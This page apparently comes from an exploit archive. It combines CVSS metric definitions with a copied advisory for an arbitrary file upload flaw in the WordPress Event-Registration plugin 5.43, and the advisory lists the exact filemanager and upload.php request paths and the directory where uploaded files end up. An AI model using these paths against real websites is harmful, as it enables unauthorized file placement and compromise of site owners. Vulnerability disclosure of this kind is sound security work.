The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: WordPress Event-Registration Plugins 5.43 Arbitrary File Upload
####################################################################
# Exploit Title : WordPress Event-Registration Plugins 5.43 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/03/2020
# Vendor Homepage : wp-event-organiser.com
# Software Links : captainform.com/wordpress-event-registration-plugin/
wordpress.org/plugins/registrations-for-the-events-calendar/
edgetechweb.com
eventregistrationpro.com
# Software Version :
Requires at least: 2.0.2
Tested up to: 3.0.2
Software Affected Version : 5.42 - 5.43
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
This plugin is designed to allow you to take online registrations for events and classes.
Supports Paypal, Google Pay, MonsterPay or Authorize.net online payment sites for online collection of event fees.
This wordpress plugin is designed to run on a Wordpress website and provide registration events, classes, or parties.
It allows you to capture the registering persons contact information and any additional infromation
you request to a database and provides an association to an events database.
It provides the ability to send the register to either a Paypal, Google Pay, Monster Pay,
or Authorize.net online payment site for online collection of event fees.
Additionally it allows support for checks and cash payments.
Optional Captcha field on registration form.
Detailed payment management system to track and record event payments.
Reporting features provide a export list(s) of events, attendees, payments in excel or csv.
Events can be created in an Excel spreadsheet and uploaded via the event upload tool.
Dashboard widget allows for quick reference to events from the dashboard.
Inline menu navigation allows for ease of use.
== Installation ==
1. After unzipping, upload everything in the `Events Registration`
folder to your `/wp-content/plugins/` directory (preserving directory structure).
2. Activate the plugin through the 'Plugins' menu in WordPress.
3. Go to the Event Registration Menu and Configure Organization and enter your company info -
note you will need a paypal id if you plan on accepting paypal payments
4. Go to the Event Setup and create a new event, make sure you select 'make active'.
5. Create a new page (not post) on your site. Put `{EVENTREGIS}` in it on a line by itself.
6. Note: if you are upgradings from a previous version please backup your data prior to upgrade.
####################################################################
# Impact :
***********
WordPress Event-Registration Plugins 5.43 is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files
Valid extensions:gif, jpg, htm, html, pdf, zip
Max upload size:10 MB
Directory File Path :
**********************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/[YOURFILENAME].html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum